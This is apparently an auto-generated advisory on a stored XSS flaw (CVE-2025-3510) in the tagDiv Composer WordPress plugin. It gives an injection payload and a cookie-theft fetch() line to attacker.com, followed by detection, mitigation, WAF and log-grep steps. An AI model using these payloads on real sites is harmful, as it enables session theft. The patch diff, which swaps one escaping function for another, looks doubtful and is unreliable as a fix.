How CVE-2025-3510 Works
The tagDiv Composer plugin (≤ v5.4) for WordPress fails to sanitize user-supplied attributes in multiple shortcodes. Authenticated attackers with contributor-level access or higher can inject malicious JavaScript via crafted shortcode attributes. When a victim visits a page containing the poisoned shortcode, the payload executes in their browser, enabling session hijacking, defacement, or malware delivery. The vulnerability stems from improper output escaping when rendering shortcode attributes in frontend HTML.
DailyCVE Form
Platform: WordPress
Version: ≤5.4
Vulnerability: Stored XSS
Severity: Critical
Date: 2025-05-06
What Undercode Say:
Exploitation
1. Payload Injection:
[td_shortcode onmouseover="alert(document.cookie)" class="malicious"]
2. Cookie Theft:
fetch('https://attacker.com/steal?data='+btoa(document.cookie));
Detection
1. Plugin Version Check:
wp plugin list --name=tagdiv-composer --field=version
2. Code Audit:
grep -r "do_shortcode" /wp-content/plugins/tagdiv-composer/
Mitigation
1. Immediate Action:
wp plugin deactivate tagdiv-composer
2. Permanent Fix:
wp plugin update tagdiv-composer --version=5.5
WAF Rules
location ~ /wp-content/plugins/tagdiv-composer/ {
deny all;
}
Log Analysis
grep -i "td_shortcode" /var/log/nginx/access.log | grep -E "<script|onerror"
Patch Diff
- echo ' < div class="'.esc_attr($atts['class']).'">'; + echo ' < div class="'.sanitize_html_class($atts['class']).'">';
References
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
